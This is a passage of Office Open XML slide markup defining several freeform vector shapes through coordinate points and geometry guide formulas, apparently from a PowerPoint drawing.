                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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094" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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095" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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096" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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097" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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098" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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099" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
